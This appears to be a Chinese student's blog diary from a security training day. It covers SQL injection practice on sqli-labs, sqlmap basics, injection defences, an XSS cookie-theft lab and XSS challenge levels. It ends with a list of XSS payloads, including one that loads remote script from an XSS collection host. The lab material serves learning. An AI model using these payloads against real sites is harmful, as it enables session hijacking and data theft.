实训第三天

博主： Xherlock
发布时间：2022 年 07 月 13 日
560 次浏览
暂无评论
1965字数
分类：实训

实训第三天

虚拟机安装和配置sqli-labs

物理机访问：

sqli-labs练习

Less-5：盲注

Less-7：文件注入

Less-9：延时注入

Less-5：报错注入，使用extravalue

爆出数据库名

爆出数据表名

Less-11：post法+联合注入

Less-12：双引号+括号闭合

初步了解sqlmap的使用
了解sql注入

概念和原理：攻击者通过注入sql语句片段，导致后端执行预期外的sql查询

危害：1.拖库 2.读写文件 3.执行系统命令

防护思路：对输入的特殊字符进行转义；正确使用预编译技术进行防护；非必要不开启文件和命令执行权限；进行库和用户的权限隔离

观看学习xss（cross site scripting）演示，学习xss的基本知识和攻击目的：攻击者嵌入自己的恶意js代码，使其他用户浏览器执行
实战btslab练习XSS窃取cookie并利用

编写有弹窗的页面

xss挑战

level-1：尝试用输入的js元素替换test，使得页面弹窗。

level-2：闭合input标签

js的各种引入方式

<script>alert(1);</script> //直接嵌入script 
<input name=keyword value="" onmouseover="alert(1)"> //通过事件属性值传入script字符串
<script src='https://xsspt.com/MQzN0Z'></script> //从远程嵌入script 
<a HREF=javascript:alert(1)>aaa</a> //超链接 
或者：<a HREF=javascript:alert(1)>aaa</a> //html实体转义 
<svg onload=alert(1)> 
<svg><script>alert(1)</script>

最后修改：2022 年 07 月 13 日

© 允许规范转载

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

Reverse（十一）
浏览次数: 8358
Win11新机鼓捣记录
浏览次数: 2716
js逆向爬虫1
浏览次数: 1916
栈~数制转换
浏览次数: 1906
C++学习
浏览次数: 1900

mars
博主你好，请问怎么知道的alloc函数属于Buffer下的方法...
lj
该评论仅登录用户及评论双方可见
Mr.Guan
:@(赞一个)
Typecho
欢迎加入 Typecho 大家族

SmileyCTF 2025 wp
浏览次数: 30
机试day8
浏览次数: 459
操作系统实验Lab01
浏览次数: 697
python实现电影日历推荐
浏览次数: 618
计组复习1~一、二、四单元
浏览次数: 605

实训第三天

Xherlock • 2022 年 07 月 13 日

<h1>实训第三天</h1><ol><li>虚拟机安装和配置sqli-labs</li></ol><p>物理机访问：</p><p><img src="http://xherlock.top/usr/uploads/2022/07/2205217167.png" alt="image-20220713103942581.png" title="image-20220713103942581.png" style=""></p><ol><li>sqli-labs练习</li></ol><p>Less-5：盲注</p><p><img src="http://xherlock.top/usr/uploads/2022/07/1399656230.png" alt="less-5-1.png" title="less-5-1.png" style=""></p><p><img src="http://xherlock.top/usr/uploads/2022/07/2470864297.png" alt="less-5-2.png" title="less-5-2.png" style=""></p><p>Less-7：文件注入</p><p><img src="http://xherlock.top/usr/uploads/2022/07/35471840.png" alt="zhuru.png" title="zhuru.png" style=""></p><p><img src="http://xherlock.top/usr/uploads/2022/07/2176714956.png" alt="result.png" title="result.png" style=""></p><p>Less-9：延时注入</p><p>Less-5：报错注入，使用extravalue</p><p>爆出数据库名</p><p><img src="http://xherlock.top/usr/uploads/2022/07/2096830628.png" alt="less-5-db.png" title="less-5-db.png" style=""></p><p>爆出数据表名</p><p><img src="http://xherlock.top/usr/uploads/2022/07/2401353469.png" alt="less-5-table.png" title="less-5-table.png" style=""></p><p>Less-11：post法+联合注入</p><p><img src="http://xherlock.top/usr/uploads/2022/07/1313880253.png" alt="less-11-col_num.png" title="less-11-col_num.png" style=""></p><p><img src="http://xherlock.top/usr/uploads/2022/07/3094565880.png" alt="less-11-db.png" title="less-11-db.png" style=""></p><p><img src="http://xherlock.top/usr/uploads/2022/07/2466842354.png" alt="less-11-table.png" title="less-11-table.png" style=""></p><p>Less-12：双引号+括号闭合</p><p><img src="http://xherlock.top/usr/uploads/2022/07/3208089665.png" alt="image-20220713141256904.png" title="image-20220713141256904.png" style=""></p><ol><li>初步了解sqlmap的使用</li><li>了解sql注入</li></ol><p>概念和原理：攻击者通过注入sql语句片段，导致后端执行预期外的sql查询</p><p>危害：1.拖库 2.读写文件 3.执行系统命令</p><p>防护思路：对输入的特殊字符进行转义；正确使用预编译技术进行防护；非必要不开启文件和命令执行权限；进行库和用户的权限隔离</p><ol><li>观看学习xss（cross site scripting）演示，学习xss的基本知识和攻击目的：攻击者嵌入自己的恶意js代码，使其他用户浏览器执行</li><li>实战btslab练习XSS窃取cookie并利用</li></ol><p><img src="http://xherlock.top/usr/uploads/2022/07/2145597382.png" alt="image-20220713154248802.png" title="image-20220713154248802.png" style=""></p><ol><li>编写有弹窗的页面</li></ol><p><img src="http://xherlock.top/usr/uploads/2022/07/3245321956.png" alt="image-20220713155410356.png" title="image-20220713155410356.png" style=""></p><ol><li>xss挑战</li></ol><p>level-1：尝试用输入的js元素替换test，使得页面弹窗。</p><p><img src="http://xherlock.top/usr/uploads/2022/07/2767204590.png" alt="img" title="img" style=""></p><p>level-2：闭合input标签</p><p><img src="http://xherlock.top/usr/uploads/2022/07/1458305646.png" alt="" title="" style=""></p><p>js的各种引入方式</p><pre><code>&lt;script&gt;alert(1);&lt;/script&gt; //直接嵌入script 
&lt;input name=keyword value=&quot;&quot; onmouseover=&quot;alert(1)&quot;&gt; //通过事件属性值传入script字符串
&lt;script src='https://xsspt.com/MQzN0Z'&gt;&lt;/script&gt; //从远程嵌入script 
&lt;a HREF=javascript:alert(1)&gt;aaa&lt;/a&gt; //超链接 
或者：&lt;a HREF=javascript:alert(1)&gt;aaa&lt;/a&gt; //html实体转义 
&lt;svg onload=alert(1)&gt; 
&lt;svg&gt;&lt;script&gt;alert(1)&lt;/script&gt;</code></pre>